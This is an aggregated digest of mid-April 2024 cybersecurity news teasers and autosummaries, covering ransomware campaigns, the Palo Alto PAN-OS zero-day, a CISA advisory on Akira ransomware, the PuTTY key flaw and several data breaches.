          Threat actors are exploiting unpatched Atlassian servers to deploy a Linux variant of Cerber (aka C3RB3R) ransomware. The attacks leverage CVE-2023-22518 (CVSS score: 9.1), a critical security vulnerability impacting the Atlassian Confluence Data Center and Server that allows an unauthenticated attacker to reset Confluence and create an administrator account. Armed with this access, a "

          Autosummary: The development comes amid the emergence of new ransomware families like Evil Ant, HelloFire, L00KUPRU (an Xorist ransomware variant), Muliaka (based on the leaked Conti ransomware code), Napoli (a Chaos ransomware variant), Red CryptoApp, Risen, and SEXi (based on the leaked Babuk ransomware code) that have been spotted targeting Windows and VMware ESXi servers. "


          Hackers Exploit Fortinet Flaw, Deploy ScreenConnect, Metasploit in New Campaign

          exploits
          2024-04-17 https://thehackernews.com/2024/04/hackers-exploit-fortinet-flaw-deploy.html
          Cybersecurity researchers have discovered a new campaign that's exploiting a recently disclosed security flaw in Fortinet FortiClient EMS devices to deliver ScreenConnect and Metasploit Powerfun payloads. The activity entails the exploitation of CVE-2023-48788 (CVSS score: 9.3), a critical SQL injection flaw that could permit an unauthenticated attacker to execute unauthorized code or "

          Autosummary: "


          Multiple botnets exploiting one-year-old TP-Link flaw to hack routers

          exploits
          2024-04-17 https://www.bleepingcomputer.com/news/security/multiple-botnets-exploiting-one-year-old-tp-link-flaw-to-hack-routers/
          At least six distinct botnet malware operations are hunting for TP-Link Archer AX21 (AX1800) routers vulnerable to a command injection security issue reported and addressed last year. [...] "

          Autosummary: Diagram of activity concerning CVE-2023-1389 (Fortinet) "Recently, we observed multiple attacks focusing on this year-old vulnerability, spotlighting botnets like Moobot, Miori, the Golang-based agent "AGoent," and the Gafgyt Variant." "


          Russian APT Deploys New "Kapeka" Backdoor in Eastern European Attacks

          rusia-ucrania
          2024-04-17 https://thehackernews.com/2024/04/russian-apt-deploys-new-kapeka-backdoor.html
          A previously undocumented "flexible" backdoor called Kapeka has been "sporadically" observed in cyber attacks targeting Eastern Europe, including Estonia and Ukraine, since at least mid-2022. The findings come from Finnish cybersecurity firm WithSecure, which attributed the malware to the Russia-linked advanced persistent threat (APT) group tracked as Sandworm (aka APT44 or "

          Autosummary: "The backdoor's victimology, infrequent sightings, and level of stealth and sophistication indicate APT-level activity, highly likely of Russian origin." "


          Moldovan charged for operating botnet used to push ransomware

          exploits ransomware
          2024-04-17 https://www.bleepingcomputer.com/news/security/moldovan-charged-for-operating-botnet-used-to-push-ransomware/
          The U.S. Justice Department charged Moldovan national Alexander Lefterov, the owner and operator of a large-scale botnet that infected thousands of computers across the United States. [...] "

          Autosummary: "


          Cisco discloses root escalation flaw with public exploit code

          exploits
          2024-04-17 https://www.bleepingcomputer.com/news/security/cisco-discloses-root-escalation-flaw-with-public-exploit-code/
          Cisco has released patches for a high-severity Integrated Management Controller (IMC) vulnerability with public exploit code that can let local attackers escalate privileges to root. [...] "

          Autosummary: "


          Russian Sandworm hackers pose as hacktivists in water utility breaches

          rusia-ucrania
          2024-04-17 https://www.bleepingcomputer.com/news/security/russian-sandworm-hackers-pose-as-hacktivists-in-water-utility-breaches/
          The Sandworm hacking group associated with Russian military intelligence has been hiding attacks and operations behind multiple online personas posing as hacktivist groups. [...] "

          Autosummary: "These aims include priming the information space with narratives favorable to Russia, generating perceptions of popular support for the war for domestic and foreign audiences, and making the GRU’s cyber capabilities appear more potent through exaggerated claims of impact" - Mandiant. The war in Ukraine made Sandworm notorious for launching multi-faceted attacks aimed at causing damage to the country's critical infrastructure and services, including state networks, telecommunications providers, news media, and the power grid. "


          Linux variant of Cerber ransomware targets Atlassian servers

          exploits ransomware Linux
          2024-04-17 https://securityaffairs.com/161962/cyber-crime/cerber-ransomware-cve-2023-22518-atlassian.html
          Threat actors are exploiting the CVE-2023-22518 flaw in Atlassian servers to deploy a Linux variant of Cerber (aka C3RB3R) ransomware. At the end of October 2023, Atlassian warned of a critical security flaw, tracked as CVE-2023-22518 (CVSS score 9.1), that affects all versions of Confluence Data Center and Server. The vulnerability is an improper authorization issue that can lead to […] "

          Autosummary: The agttydck malware, written in C++ and packed with UPX, performs several malicious actions: it logs activity in “/tmp/log.0” at startup and “/tmp/log.1” at completion, searches the root directory for encryptable directories, drops a ransom note in each directory, and encrypts all files, appending a “.L0CK3D” extension. "


          SoumniBot malware exploits Android bugs to evade detection

          exploits
          2024-04-17 https://www.bleepingcomputer.com/news/security/soumnibot-malware-exploits-android-bugs-to-evade-detection/
          A new Android banking malware named "SoumniBot" is using a less common obfuscation approach by exploiting weaknesses in the Android manifest extraction and parsing procedure. [...] "

          Autosummary: Tricking Android's parser: manifest files ("AndroidManifest.xml") are present in each app's root directory and contain details about components (services, broadcast receivers, content providers), permissions, and app data. "


          FIN7 targets American automaker’s IT staff in phishing attacks

          financial
          2024-04-17 https://www.bleepingcomputer.com/news/security/fin7-targets-american-automakers-it-staff-in-phishing-attacks/
          The financially motivated threat actor FIN7 targeted a large U.S. car maker with spear-phishing emails for employees in the IT department to infect systems with the Anunak backdoor. [...] "

          Autosummary: Once executed, the file triggers a multi-stage process involving DLL, WAV files, and shellcode execution, leading to loading and decrypting a file named "dmxl.bin," which contains the Anunak backdoor payload. "


          Smashing Security podcast #368: Gary Barlow, and a scam turns deadly

          financial
          2024-04-17 https://grahamcluley.com/smashing-security-podcast-368/
          Take That's Gary Barlow chats up a pizza-slinging granny from Essex via Facebook, or does he? And a scam takes a sinister turn - for both the person being scammed and an innocent participant - in Ohio. All this and more is discussed in the latest edition of the "Smashing Security" podcast by cybersecurity veterans Graham Cluley and Carole Theriault. "

          Autosummary: Hosts: Graham Cluley – @gcluley Carole Theriault – @caroletheriault Episode links: Sponsored by: Bitwarden – Password security you can trust. "


          #StopRansomware: Akira Ransomware

          exploits ransomware
          2024-04-17 https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-109a

          SUMMARY

          Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

          The United States’ Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), Europol’s European Cybercrime Centre (EC3), and the Netherlands’ National Cyber Security Centre (NCSC-NL) are releasing this joint CSA to disseminate known Akira ransomware IOCs and TTPs identified through FBI investigations and trusted third party reporting as recently as February 2024.

          Since March 2023, Akira ransomware has impacted a wide range of businesses and critical infrastructure entities in North America, Europe, and Australia. In April 2023, following an initial focus on Windows systems, Akira threat actors deployed a Linux variant targeting VMware ESXi virtual machines. As of January 1, 2024, the ransomware group has impacted over 250 organizations and claimed approximately $42 million (USD) in ransomware proceeds.

          Early versions of the Akira ransomware variant were written in C++ and encrypted files with a .akira extension; however, beginning in August 2023, some Akira attacks began deploying Megazord, using Rust-based code which encrypts files with a .powerranges extension.  Akira threat actors have continued to use both Megazord and Akira, including Akira_v2 (identified by trusted third party investigations) interchangeably.

          The FBI, CISA, EC3, and NCSC-NL encourage organizati "

          Autosummary: The FBI, CISA, EC3, and NCSC-NL do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. To establish command and control channels, threat actors leverage readily available tools like AnyDesk, MobaXterm, RustDesk, Ngrok, and Cloudflare Tunnel, enabling exfiltration through various protocols such as File Transfer Protocol (FTP), Secure File Transfer Protocol (SFTP), and cloud storage services like Mega. Additional details of interest include: a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host- and network-based indicators. SoftPerfect: a network scanner (netscan.exe) used to ping computers, scan ports, discover shared folders, and retrieve information about network devices via Windows Management Instrumentation (WMI), Simple Network Management Protocol (SNMP), HTTP, Secure Shell (SSH) and PowerShell. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the FBI or CISA. VALIDATE SECURITY CONTROLS: In addition to applying mitigations, the FBI, CISA, EC3, and NCSC-NL recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory.
          The FBI is interested in any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Akira threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. Previous versions of the encryptor provided options to insert arguments at runtime, including: -p --encryption_path (targeted file/folder paths), -s --share_file (targeted network drive path), -n --encryption_percent (percentage of encryption), --fork (create a child process for encryption). The ability to insert additional threads allows Akira threat actors to have more granular control over the number of CPU cores in use, increasing the speed and efficiency of the encryption process. [T1133], spear phishing [T1566.001][T1566.002], and the abuse of valid credentials [T1078].[4] Persistence and Discovery: Once initial access is obtained, Akira threat actors attempt to abuse the functions of domain controllers by creating new domain accounts [T1136.002] to establish persistence. MITIGATIONS, Network Defenders: The FBI, CISA, EC3, and NCSC-NL recommend organizations apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the risk of compromise by Akira ransomware. A tool used to acquire detailed process and system information [T1082].[7] PowerShell: a cross-platform task automation solution made up of a command line shell, a scripting language, and a configuration management framework, which runs on Windows, Linux, and macOS.
          The FBI, CISA, EC3, and NCSC-NL recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory. Exfiltration and Impact: Akira threat actors leverage tools such as FileZilla, WinRAR [T1560.001], WinSCP, and RClone to exfiltrate data [T1048]. "


          EU demands answers on money-for-views version of TikTok

          financial
          2024-04-17 https://www.bbc.com/news/articles/c80zdz2n8wwo
          The platform has been given 24 hours to provide information about the potential risks of TikTok Lite. "

          Autosummary: "


          AI set to enhance cybersecurity roles, not replace them

          ciber
          2024-04-16 https://www.helpnetsecurity.com/2024/04/16/caleb-sima-csa-security-pros-ai/

          In this Help Net Security interview, Caleb Sima, Chair of CSA AI Security Alliance, discusses how AI empowers security pros, emphasizing its role in enhancing skills and productivity rather than replacing staff. AI is seen as empowering rather than replacing security pros. How do you foresee AI changing their roles in the future? While the future of AI replacing jobs remains uncertain, I am confident it’s not imminent. AI is a tool that can be … More

          The post AI set to enhance cybersecurity roles, not replace them appeared first on Help Net Security.

          "

          Autosummary: In fact, a survey – State of AI and Security Survey Report – that CSA recently conducted with Google found that the majority of organizations plan to use AI to strengthen their teams, whether that means enhancing their skills and knowledge base (36%) or improving detection times (26%) and productivity (26%), rather than replacing staff altogether.That being the case, I’d caution companies, regardless of where they are on their AI journey, to understand that they will encounter challenges, whether from integrating this technology into current processes or ensuring that staff are properly trained in using this revolutionary technology, and that’s to be expected. "


          Ransomware group Dark Angels claims the theft of 1TB of data from chipmaker Nexperia

          exploits
          2024-04-16 https://securityaffairs.com/161888/cyber-crime/ransomware-dark-angels-nexperia.html
          The Dark Angels (Dunghill) ransomware group claims the hack of the chipmaker Nexperia and the theft of 1 TB of data from the company. The Dark Angels (Dunghill) ransomware group claims responsibility for hacking chipmaker Nexperia and stealing 1 TB of the company’s data. Nexperia is a semiconductor manufacturer headquartered in Nijmegen, the Netherlands. It […] "

          Autosummary: According to the announcement, the stolen data includes: - 285 Gb of quality control data - 24 Gb - 896 client folders, many famous brands like SpaceX, IBM, Apple, Huawei, etc. - 139 Gb project data, very detailed and highly confidential: NDA, internal documents, trade secrets, design, specifications, manufacturing - 49 Gb industrial production data and instructions - Assessment of the product's competitiveness in comparison with competitors - 45 Gb engineers' experience and studies - 20 Gb product management - 201 Gb semiconductor manufacturing technologies - 70 Gb semiconductor commercial marketing data - 26 Gb pricing, analysis, price books - 20 Gb HR department, employee data, personal data, passports, contracts, diplomas, salaries, insurance. "


          GuidePoint Security introduces IoT Security Assessment

          industry
          2024-04-16 https://www.helpnetsecurity.com/2024/04/16/guidepoint-security-iot-security-assessment/

          GuidePoint Security announced its IoT Security Assessment, a new cybersecurity service. GuidePoint Security’s team of IoT security and embedded systems experts have extensive experience identifying potential weaknesses in IoT devices and applications across a wide range of industries. Organizations that leverage GuidePoint’s targeted IoT Security Assessment can ultimately identify and fix vulnerabilities, fortify their defenses, inspire confidence in their customers, and prevent unwanted access to their IoT ecosystem. “IoT devices are prevalent in many industries, … More

          The post GuidePoint Security introduces IoT Security Assessment appeared first on Help Net Security.

          "

          Autosummary: “IoT devices are prevalent in many industries, yet the risks associated with them are often underestimated or overlooked, leaving many organizations and their IT systems vulnerable to potential threats,” said Victor Wieczorek, VP of Application Security and Threat & Attack Simulation, GuidePoint Security. "


          Identity in the Shadows: Shedding Light on Cybersecurity's Unseen Threats

          ciber
          2024-04-16 https://thehackernews.com/2024/04/identity-in-shadows-shedding-light-on.html
          In today's rapidly evolving digital landscape, organizations face an increasingly complex array of cybersecurity threats. The proliferation of cloud services and remote work arrangements has heightened the vulnerability of digital identities to exploitation, making it imperative for businesses to fortify their identity security measures. Our recent research report, The Identity Underground "

          Autosummary: The report paints a vivid picture of the "hidden" identity security liabilities where attackers leverage Identity Threat Exposures (ITEs) such as forgotten user accounts and misconfigurations to breach organizations' defenses, with each ITE posing a significant threat to organizations' security posture. "


          UnitedHealth: Change Healthcare cyberattack caused $872 million loss

          ciber
          2024-04-16 https://www.bleepingcomputer.com/news/security/unitedhealth-change-healthcare-cyberattack-caused-872-million-loss/
          UnitedHealth Group reported an $872 million impact on its Q1 earnings due to the ransomware attack disrupting the U.S. healthcare system since February. [...] "

          Autosummary: While first linked by the company to "nation-state" hackers, the attack was later linked to the BlackCat/ALPHV ransomware group, who claimed they stole 6 TB of data during the breach. The ransomware gang shut down its operation and likely pulled an exit scam by stealing a $22 million ransom paid to Notchy, the affiliate who coordinated the attack. "


          TA558 Hackers Weaponize Images for Wide-Scale Malware Attacks

          exploits
          2024-04-16 https://thehackernews.com/2024/04/ta558-hackers-weaponize-images-for-wide.html
          The threat actor tracked as TA558 has been observed leveraging steganography as an obfuscation technique to deliver a wide range of malware such as Agent Tesla, FormBook, Remcos RAT, LokiBot, GuLoader, Snake Keylogger, and XWorm, among others. "The group made extensive use of steganography by sending VBSs, PowerShell code, as well as RTF documents with an embedded exploit, inside "

          Autosummary: Beyond Agent Tesla, other variants of the attack chain have led to an assortment of malware such as FormBook, GuLoader, LokiBot, Remcos RAT, Snake Keylogger, and XWorm, which are designed for remote access, data theft, and delivery of secondary payloads. "


          Exploit released for Palo Alto PAN-OS bug used in attacks, patch now

          exploits
          2024-04-16 https://www.bleepingcomputer.com/news/security/exploit-released-for-palo-alto-pan-os-bug-used-in-attacks-patch-now/
          Exploit code is now available for a maximum severity and actively exploited vulnerability in Palo Alto Networks' PAN-OS firewall software. [...] "

          Autosummary: "


          PuTTY vulnerability can be exploited to recover private keys (CVE-2024-31497)

          exploits
          2024-04-16 https://www.helpnetsecurity.com/2024/04/16/cve-2024-31497/

          A vulnerability (CVE-2024-31497) in PuTTY, a popular SSH and Telnet client, could allow attackers to recover NIST P-521 client keys due to the “heavily biased” ECDSA nonces (random values used once), researchers have discovered. “To be more precise, the first 9 bits of each ECDSA nonce are zero. This allows for full secret key recovery in roughly 60 signatures by using state-of-the-art techniques,” Fabian Bäumer shared on the oss-sec mailing list. According to PuTTY maintainers, … More

          The post PuTTY vulnerability can be exploited to recover private keys (CVE-2024-31497) appeared first on Help Net Security.

          "

          Autosummary: “If the key has been used to sign arbitrary data (e.g., git commits by forwarding Pageant [an SSH authentication agent for PuTTY] to a development host), the publicly available signatures (e.g., on GitHub) can be used as well,” Bäumer noted. "


          Zarf: Open-source continuous software delivery on disconnected networks

          ransomware
          2024-04-15 https://www.helpnetsecurity.com/2024/04/15/zarf-open-source-continuous-software-delivery-on-disconnected-networks/

          Zarf is a free, open-source tool that enables continuous software delivery on disconnected networks. It currently offers fully automated support for K3s, K3d, and Kind and is also compatible with EKS, AKS, GKE, RKE2, and many other distro services. The Zarf CLI, a statically compiled binary, operates independently without any dependencies, ensuring it runs smoothly on any machine. Unlike proprietary software, Zarf avoids vendor lock-in, allowing easy removal and manual deployment. The tool excels in … More

          The post Zarf: Open-source continuous software delivery on disconnected networks appeared first on Help Net Security.

          "

          Autosummary: "


          Expand your library with these cybersecurity books

          ciber
          2024-04-15 https://www.helpnetsecurity.com/2024/04/15/cybersecurity-books-video/

          In this Help Net Security video round-up, authors discuss their cybersecurity books and provide an inside look at each title. Complete videos George Finney, CSO at Southern Methodist University, talks about his book – “Project Zero Trust: A Story about a Strategy for Aligning Security and the Business“. Eric Leblond, CTO at Stamus Networks, talks about The Security Analyst’s Guide to Suricata, a book he co-wrote with Peter Manev. Adam Shostack, the author of “Threat … More

          The post Expand your library with these cybersecurity books appeared first on Help Net Security.

          "

          Autosummary: "


          Zambia arrests 77 people in swoop on “scam” call centre

          financial
          2024-04-15 https://www.bitdefender.com/blog/hotforsecurity/zambia-arrests-77-people-in-swoop-on-scam-call-centre/
          Law enforcement officers in Zambia have arrested 77 people at a call centre company they allege had employed local school-leavers to engage in scamming internet users around the world. Read more in my article on the Hot for Security blog. "

          Autosummary: The raid on Golden Top Support Services, which has been described as a "significant breakthrough in the fight against cybercrime", not only arrested 77 people (including 22 Chinese men and one Cameroonian) but also seized vehicles, two firearms, 78 rounds of ammunition, 97 desktop PCs, 42 new and boxed computers, and over 13,000 Airtel, MTN, and Vodafone SIM cards. "


          A critical vulnerability in Delinea Secret Server allows auth bypass, admin access

          exploits
          2024-04-15 https://www.helpnetsecurity.com/2024/04/15/delinea-secret-server-vulnerability/

          Organizations with on-prem installations of Delinea Secret Server are urged to update them immediately, to plug a critical vulnerability that may allow attackers to bypass authentication, gain admin access and extract secrets. Fixing the Delinea Secret Server SOAP API vulnerability Delinea Secret Server (formerly Thycotic Secret Server) is a privileged access management (PAM) solution “for the modern, hybrid enterprise”. Among other things, PAM solutions can automate the provisioning and deprovisioning of privileged accounts, as well … More

          The post A critical vulnerability in Delinea Secret Server allows auth bypass, admin access appeared first on Help Net Security.

          "

          Autosummary: "


          Palo Alto Networks Releases Urgent Fixes for Exploited PAN-OS Vulnerability

          exploits
          2024-04-15 https://thehackernews.com/2024/04/palo-alto-networks-releases-urgent.html
          Palo Alto Networks has released hotfixes to address a maximum-severity security flaw impacting PAN-OS software that has come under active exploitation in the wild. Tracked as CVE-2024-3400 (CVSS score: 10.0), the critical vulnerability is a case of command injection in the GlobalProtect feature that an unauthenticated attacker could weaponize to execute arbitrary code with root "

          Autosummary: "


          Daixin ransomware gang claims attack on Omni Hotels

          exploits ransomware
          2024-04-15 https://www.bleepingcomputer.com/news/security/daixin-ransomware-gang-claims-attack-on-omni-hotels/
          The Daixin Team ransomware gang claimed a recent cyberattack on Omni Hotels & Resorts and is now threatening to publish customers' sensitive information if a ransom is not paid. [...] "

          Autosummary: Omni Hotels Daixin Team leak (BleepingComputer). In October 2022, CISA, the FBI, and the Department of Health and Human Services (HHS) warned the Daixin Team cybercrime gang was targeting the U.S. Healthcare and Public Health (HPH) sector in ransomware attacks. "


          Cisco Duo warns third-party data breach exposed SMS MFA logs

          financial
          2024-04-15 https://www.bleepingcomputer.com/news/security/cisco-duo-warns-third-party-data-breach-exposed-sms-mfa-logs/
          Cisco Duo's security team warns that hackers stole some customers' VoIP and SMS logs for multi-factor authentication (MFA) messages in a cyberattack on their telephony provider. [...] "

          Autosummary: The data contained in these logs includes an employee's phone number, carrier, location data, date, time, and message type. When the impacted supplier discovered the breach, they invalidated the compromised credentials, analyzed activity logs, and notified Cisco accordingly. "


          Palo Alto Networks fixes zero-day exploited to backdoor firewalls

          exploits
          2024-04-15 https://www.bleepingcomputer.com/news/security/palo-alto-networks-fixes-zero-day-exploited-to-backdoor-firewalls/
          Palo Alto Networks has started releasing hotfixes for a zero-day vulnerability that has been actively exploited since March 26th to backdoor PAN-OS firewalls. [...] "

          Autosummary: The company has now fixed the security flaw in hotfix releases issued for PAN-OS 10.2.9-h1, PAN-OS 11.0.4-h1, and PAN-OS 11.1.2-h3. "


          CISA adds Palo Alto Networks PAN-OS Command Injection flaw to its Known Exploited Vulnerabilities catalog

          exploits
          2024-04-15 https://securityaffairs.com/161855/hacking/palo-alto-networks-pan-os-bug-known-exploited-vulnerabilities-catalog.html
          U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Palo Alto Networks PAN-OS Command Injection flaw to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the CVE-2024-3400 Palo Alto Networks PAN-OS Command Injection vulnerability to its Known Exploited Vulnerabilities (KEV) catalog: CVE-2024-3400 (CVSS score of 10.0) is a critical command injection vulnerability […] "

          Autosummary: "


          Threat actors exploited Palo Alto Pan-OS issue to deploy a Python Backdoor

          exploits
          2024-04-15 https://securityaffairs.com/161844/apt/palo-alto-pan-os-python-backdoor.html
          Threat actors have been exploiting the recently disclosed zero-day in Palo Alto Networks PAN-OS since March 26, 2024. Palo Alto Networks and Unit 42 are investigating the activity related to CVE-2024-3400 PAN-OS flaw and discovered that threat actors have been exploiting it since March 26, 2024. CVE-2024-3400 (CVSS score of 10.0) is a critical command […] "

          Autosummary: After execution, the script records the command output in the file: [snip]/css/bootstrap.min.css. A noteworthy aspect of the attack sequence is that both the files used for command extraction and result logging are authentic files linked with the firewall: /var/log/pan/sslvpn_ngx_error.log and /var/appweb/sslvpndocs/global-protect/portal/css/bootstrap.min.css. “The script will then create another thread that runs a function called restore.” "


          Chipmaker Nexperia confirms breach after ransomware gang leaks data

          exploits ransomware
          2024-04-15 https://www.bleepingcomputer.com/news/security/chipmaker-nexperia-confirms-breach-after-ransomware-gang-leaks-data/
          Dutch chipmaker Nexperia confirmed late last week that hackers breached its network in March 2024 after a ransomware gang leaked samples of allegedly stolen data. [...] "

          Autosummary: 41.5 GB of corporate data, including HR, employee personal details, passports, NDAs, etc. 109 GB of client and user data, including brands such as SpaceX, IBM, Apple, and Huawei. "


          Ransomware gang starts leaking alleged stolen Change Healthcare data

          exploits
          2024-04-15 https://www.bleepingcomputer.com/news/security/ransomware-gang-starts-leaking-alleged-stolen-change-healthcare-data/
          The RansomHub extortion gang has begun leaking what they claim is corporate and patient data stolen from United Health subsidiary Change Healthcare in what has been a long and convoluted extortion process for the company. [...] "

Autosummary: A true double extortion: after BlackCat shut down, the affiliate, Notchy, partnered with the RansomHub ransomware gang to extort Change Healthcare once again, even though the company allegedly already paid a ransom. "


          Cisco Duo warns telephony supplier data breach exposed MFA SMS logs

          financial
          2024-04-15 https://securityaffairs.com/161880/cyber-crime/cisco-duo-data-breach.html
Cisco Duo warns that a data breach involving one of its telephony suppliers exposed multifactor authentication (MFA) messages sent by the company to its customers via SMS and VOIP. The […] "

          Autosummary: The message logs did not contain any message content but did contain the phone number, phone carrier, country, and state to which each message was sent, as well as other metadata (e.g., date and time of the message, type of message, etc.).” "


          Ukrainian Blackjack group used ICS malware Fuxnet against Russian targets

          exploits industry rusia-ucrania
          2024-04-15 https://securityaffairs.com/161865/hacking/blackjack-ics-malware-fuxnet.html
The Ukrainian hacking group Blackjack used a destructive ICS malware dubbed Fuxnet in attacks against Russian infrastructure. Industrial and enterprise IoT cybersecurity firm Claroty reported that the group claims to have damaged emergency detection and response capabilities in Moscow and beyond the Russian capital using the malware. The […] "

Autosummary: “The attackers developed and deployed malware that targeted the gateways and deleted filesystems, directories, disabled remote access services, routing services for each device, and rewrote flash memory, destroyed NAND memory chips, UBI volumes and other actions that further disrupted operation of these gateways,” concludes the report. “However, our analysis of data leaked by Blackjack, including the Fuxnet malware, indicates that only a little more than 500 sensor gateways were bricked by the malware in the attack, and the remote sensors and controllers likely remain intact,” reads the analysis published by Claroty. "


          Bitcoin scams, hacks and heists – and how to avoid them

          financial
          2024-04-15 https://www.welivesecurity.com/en/scams/bitcoin-scams-hacks-heists-protect-yourself/
          Here’s how cybercriminals target cryptocurrencies and how you can keep your bitcoin or other crypto safe "

Autosummary: Only download apps from official app stores and never download pirated software; ensure your device is loaded with anti-malware software from a trusted provider; use a password manager for long, unique passwords on all accounts; use 2FA for your wallet and device; be skeptical: don’t click on links in unsolicited attachments or on social media ads/posts, even if they appear to be from legitimate sources; store your crypto in a “cold wallet” (one not connected to the internet) such as Trezor, as this insulates it from online threats; always do your research before making any crypto investments; always keep devices and software updated; avoid logging on to public Wi-Fi without a virtual private network (VPN); never send strangers crypto, even if you’ve ‘met’ them online; before choosing an exchange, research its security credentials; separate your crypto trading from your personal and work devices and accounts. One variant, MS Drainer, stole an estimated $59m over a nine-month period. Common info-stealers like RedLine Stealer, Agent Tesla, and Raccoon Stealer all have crypto-stealing capabilities; ClipBanker Trojans, another type of general info-stealer, also exfiltrate cryptocurrency wallet addresses. Crypto-stealing malware is often found hidden in fake apps. "


          Week in review: Palo Alto Networks firewalls under attack, Microsoft patches two exploited zero-days

          exploits
          2024-04-14 https://www.helpnetsecurity.com/2024/04/14/week-in-review-palo-alto-networks-firewalls-under-attack-microsoft-patches-two-exploited-zero-days/

          Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Palo Alto Networks firewalls under attack, hotfixes incoming! (CVE-2024-3400) Attackers are exploiting a command injection vulnerability (CVE-2024-3400) affecting Palo Alto Networks’ firewalls, the company has warned, and urged customers to implement temporary mitigations and get in touch to check whether their devices have been compromised. Strategies for secure identity management in hybrid environments In this Help Net Security interview, Charlotte … More

          The post Week in review: Palo Alto Networks firewalls under attack, Microsoft patches two exploited zero-days appeared first on Help Net Security.

          "

          Autosummary: On this April 2024 Patch Tuesday, Microsoft has fixed a record 147 CVE-numbered vulnerabilities, including CVE-2024-29988, a vulnerability that Microsoft hasn’t marked as exploited, but Peter Girnus, senior threat researcher with Trend Micro’s Zero Day Initiative (ZDI), has found being leveraged by attackers in the wild. New infosec products of the week: April 12, 2024 Here’s a look at the most interesting products from the past week, featuring releases from Akamai, Bitdefender, Siemens, Veriato, and Index Engines. "


          Canadian retail chain Giant Tiger data breach may have impacted millions of customers

          financial
          2024-04-14 https://securityaffairs.com/161811/cyber-crime/giant-tiger-data-breach.html
A threat actor who goes online by the moniker ShopifyGUY claimed responsibility for hacking the Canadian retail chain Giant Tiger and leaked 2.8 million records on a hacker forum. Giant Tiger is a Canadian discount store […] "

Autosummary: Canadian retail chain Giant Tiger data breach may have impacted millions of customers. Pierluigi Paganini, April 14, 2024. A threat actor claimed the hack of the Canadian retail chain Giant Tiger and leaked 2.8 million records on a hacker forum. "


          Hackers Deploy Python Backdoor in Palo Alto Zero-Day Attack

          exploits
          2024-04-13 https://thehackernews.com/2024/04/hackers-deploy-python-backdoor-in-palo.html
Threat actors have been exploiting the newly disclosed zero-day flaw in Palo Alto Networks PAN-OS software dating back to March 26, 2024, nearly three weeks before it came to light yesterday. The network security company's Unit 42 division is tracking the activity under the name Operation MidnightEclipse, attributing it as the work of a single threat actor of "

Autosummary: While the exact nature of the command is unknown, it's suspected that the URL serves as a delivery vehicle for a Python-based backdoor on the firewall that Volexity – which discovered in-the-wild exploitation of CVE-2024-3400 on April 10, 2024 – is tracking as UPSTYLE and is hosted on a different server ("144.172.79[.]92" and "nhdata.s3-us-west-2.amazonaws[.]com"). "


          Hacker claims Giant Tiger data breach, leaks 2.8M records online

          financial
          2024-04-13 https://www.bleepingcomputer.com/news/security/hacker-claims-giant-tiger-data-breach-leaks-28m-records-online/
          Canadian retail chain Giant Tiger disclosed a data breach in March 2024. A threat actor has now publicly claimed responsibility for the data breach and leaked 2.8 million records on a hacker forum that they claim are of Giant Tiger customers. [...] "

Autosummary: Threat actor claims Giant Tiger breach from March, leaks records online (BleepingComputer). The stolen data in the dump, claims the threat actor, additionally includes the "website activity" of Giant Tiger customers. "


          Palo Alto Networks zero-day exploited since March to backdoor firewalls

          exploits
          2024-04-13 https://www.bleepingcomputer.com/news/security/palo-alto-networks-zero-day-exploited-since-march-to-backdoor-firewalls/
          Suspected state-sponsored hackers have been exploiting a zero-day vulnerability in Palo Alto Networks firewalls tracked as CVE-2024-3400 since March 26, using the compromised devices to breach internal networks, steal data and credentials. [...] "

Autosummary: [Diagram illustrating how the Upstyle backdoor operates (Source: BleepingComputer)] In addition to the backdoor, Volexity observed the threat actors deploying additional payloads to start reverse shells, exfiltrate PAN-OS configuration data, remove log files, and deploy the Golang tunneling tool named GOST. Exploiting zero-day since March: Volexity says it first detected the zero-day exploitation on April 10, 2024, within the GlobalProtect feature of Palo Alto Networks PAN-OS, and notified the vendor of the activity. "


          Crooks manipulate GitHub’s search results to distribute malware

          exploits
          2024-04-13 https://securityaffairs.com/161792/cyber-crime/githubs-search-results-distribute-malware.html
Checkmarx researchers reported that threat actors are manipulating GitHub search results to deliver persistent malware to developers’ systems. Attackers behind this campaign create malicious repositories with popular names and topics, and were observed using techniques like automated updates and fake […] "

Autosummary: Crooks manipulate GitHub’s search results to distribute malware. Pierluigi Paganini, April 13, 2024. Researchers warn threat actors are manipulating GitHub search results to target developers with persistent malware. "


          Why women struggle in the cybersecurity industry

          industry ciber
          2024-04-12 https://www.helpnetsecurity.com/2024/04/12/women-cybersecurity-workplace-experiences/

          The workplace experiences of women in cybersecurity are dramatically worse than men across virtually every category, according to a WiCyS and Aleria survey. Previous studies have illustrated that the representation of women in cybersecurity is much lower than it should be, but can’t explain why or how we can improve matters. Women confront exclusion at higher rates Women encounter exclusion at twice the rate of men, signaling a pressing need for industry-wide cultural and procedural … More

          The post Why women struggle in the cybersecurity industry appeared first on Help Net Security.

          "

Autosummary: Top four categories of exclusion: the top four categories of exclusion faced by women are respect, career and growth, access and participation, and recognition, signaling critical intervention points. "


          Zero-Day Alert: Critical Palo Alto Networks PAN-OS Flaw Under Active Attack

          exploits
          2024-04-12 https://thehackernews.com/2024/04/zero-day-alert-critical-palo-alto.html
